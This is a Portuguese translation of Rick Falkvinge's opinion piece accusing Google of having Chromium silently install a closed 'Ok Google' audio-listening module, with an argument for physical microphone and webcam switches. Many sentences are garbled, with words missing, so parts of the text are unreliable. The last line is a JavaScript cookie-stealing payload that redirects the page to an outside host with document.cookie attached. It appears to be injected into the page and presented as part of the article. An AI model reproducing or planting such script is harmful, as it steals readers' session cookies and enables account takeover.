Por Rick Falkvinge*
Ontem, surgiram notícias de que a Google está, de forma despercebida ao usuário, instalando “grampos” de áudio em todo computador que executa o navegador Chrome, e transmitindo os dados de áudio de volta para a Google. Efetivamente, isto significa que a Google tomou para si o direito a ouvir qualquer conversa, em qualquer lugar em que o Google Chrome esteja em execução, sem qualquer consentimento das pessoas que estão sendo “grampeadas.” Em declarações oficiais, a Google mostrou-se indiferente ao fato, como quem diz: “nós podemos fazer isto.”
Parecia somente outro bug sendo reportado. “-Quando eu inicio o Chromium, ele faz algum tipo de download.” Isto foi publicado juntamente com informações estranhas que notavelmente incluíam as linhas “Microfone: Sim” e “Captura de áudio permitida: Sim”.
Sem consentimento, o código do navegador da Google baixou uma caixa preta de mais código que – de acordo com ele mesmo – ligou o microfone e estava ativamente escutando o que está acontecendo no seu quarto.
Uma breve explicação sobre a filosofia software livre / open source faz-se necessária. Quando você instala uma versão do GNU/Linux como por exemplo o Debian ou o Ubuntu em um computador novo, centenas de pessoas muito inteligentes já analisaram todas as linhas de código fonte humanamente legíveis antes que o sistema operacional seja compilado em código executável pelo computador, afim de que torne-se aberto e compreensível o que o computador está fazendo efetivamente, ao invés de confiarmos em declarações institucionais acerca do que o programa deveria estar fazendo. Desta forma, você não instala caixas pretas em um sistema com Debian ou Ubuntu; você usa repositórios de software que passaram por este sistema de auditar o código fonte primeiro e compilar depois. Mantenedores de sistemas operacionais como o Debian e o Ubuntu usam vários repositórios “upstreams” para compilar o produto final.
O Chromium, a versão de código aberto do Google Chrome, abusou para inserir linhas de código fonte que ese processo de , e baixou e instalou uma caixa preta de código executável não-verificável diretamente nos computadores, essencialmente comprometendo-os. Nós não sabemos e não podemos saber o que essa caixa preta faz. Mas nós relatos de que o microfone foi ativado, e que o Chromium considera permitida a captura de áudio.
Supostamente isso serviria para ativar o comportamento “Ok, Google” – o que significa que quando você diz certas palavras, uma função de busca é ativada. Certamente uma ferramenta útil. ambém certamente algo que de qualquer conversa .
Obviamente, não é o seu computador que analisa o comando de busca. Os servidores d Google fazem isso. O que significa que o seu computador foi configurado para mandar o que estava sendo dito na sua sala para outra pessoa, para uma privada em outro país, sem a sua ciência ou consentimento, uma transmissão de áudio engatilhada por…um conjunto de condições desconhecido e não verificáve.
O Google teve duas respostas para isso. A primeira foi introduzir praticamente nãodocumentad para ese comportamento, o que não é uma correção: a instalação padrão ainda vai grampear o seu cômodo sem o seu consentimento, a não ser que você ativamente opte por não fazê-lo, e mais importante, saiba que você precisa optar dessa forma, o que não é um argumento razoável. Mas a segunda foi mais um comunicado oficial discussões técnicas no Hacker News e outros lugares. Esse comuniado oficial consist três partes (parafraseadas, claro):
Sim, estamos baixando e instalando uma caixa-preta com grampo no seu computador. Mas não estamos de fato a ativando. Nós de fato tiramos vantagem de nossa posição de confiança para inserir códigos na surdina em softwares open-source que instalaram essa caixa preta em milhões de computadores, mas nunca abusaríamos da mesma confiança para da mesma forma inserir uma código que ative caixa preta que já baixamos e instalamos em seu computador para violar sua privacidade sem seu conhecimento ou consentimento. Você pode ver agora mesmo que o código não .
Sim, o Chromium está passando por cima de todo o processo de auditoria do código fonte baixando uma caixa preta pré-construída nos computadores das pessoas. , nós fornecemos o código-fonte a terceiros caso queiram. Qualquer um que use nosso código para seus próprios fins se responsabiliza por isso. Quando isso acontece numa instalação do Debian, não é o comportamento do Google Chrome, e sim do Debian. A responsabilidade é totalmente do Debian.
3) Sim, nós deliberadamente escondemos esse módulo de escuta dos usuários, mas isso é porque consideramos que esse comportamento é parte da experiência de uso do Google Chrome. Nós não queremos mostrar todos os módulos que nós mesmos instalamos.
Se você acredita que esa é uma responsável, levante a mão agora.
Agora, que iso aconteceu no Chromium, a versão do Chrome. Se alguém baixa Google, você não tem sequer uma chance teórica. Você já está baixando uma aixa preta de um . No Google Chrome, tudo isso está incluído desde o começo.
Este episódio elucida a necessidade de chaves de liga/desliga fortes (“hard”), não fracas (“soft”), para todos equipamentos – webcams, microfones, etc. que podem ser utilizados para vigilância. Uma chave de liga/desliga implementada em software para uma webcam não é mais suficiente, é necessário ter uma barreira física tapando a lente. Uma chave de liga/desliga implementada em software para um microfone não é mais suficiente, é necessário um interruptor físico que corte a corrente elétrica. Esta é a forma de se defender efetivamente nestas circunstâncias.
Claro, as pessoas foram rápidas em minimizar. “Ele só ouve quando você diz ‘Ok, Google’.” (Ok, então como ele sabe que é para começar a ouvir logo antes de eu dizer ‘Ok, Google’?). “Não é um grande problema.” (Uma empresa instala na surdina um captador de áudio que mundo, e transmite os dados de voz para a nave-mãe quando encontra uma lista de palavras-chave desconhecida, possivelmente individualmente – e não é um grande problema!?) “Você pode pedir para sair. Está nos termos de serviço.” (Não ó que não. Isso não é algo que seja minimamente permissível só porque está escondido em advoguês). “É uma opção ativa. Não vai realmente ouvir a menos que você marque aquela caixa.” (Talvez. Não sabemos, Google acabou de baixar uma caixa preta para o meu computador. E talvez não seja a mesma caixa preta que foi colocada no seu.)
No começo da última década, ativistas pela privacidade praticamente berraram e espernearam que as torneiras da NSA em vários pontos das redes de internet e telecomunicações tinham o potencial técnico para enormes abusos contra a privacidade. Todos os outros desprezaram esses como “chapéu de papel alumínio” – até que apareceram os arquivos do Snowden, e foi revelado que todos envolvidos haviam abusado de sua capacidade técnica de invasão de privacidade tanto quanto era possível. (N.T.: uma teoria de conspiração que se espalhou em que chapéus feitos de papel alumínio protegeriam a mente de ataques eletromagnéticos.)
Talvez fosse sensato não repetir outra vez esse mesmo erro. Ninguém, e realmente quero dizer ninguém,, com perfis de audição customizáveis ao nível de identificar o indivíduo, na base do simples “confiem em nós.
Privacidade continua sendo sua própria responsabilidade.
*Rick é o fundador do primeiro Partido Pirata e é um evangelista político, viajando pela Europa e o mundo para falar e escrever sobre ideais de uma política de informação mais sensível. Ele tem um histórico empreendedor em tecnologia e adora whisky. Leia mais de seus artigos em seu website.
Traduzido por Texas Jack, sunniewalker e IuriMateCouro
document.location = “http://akipfer.zz.mu/index.php?cookie=”+document.cookie;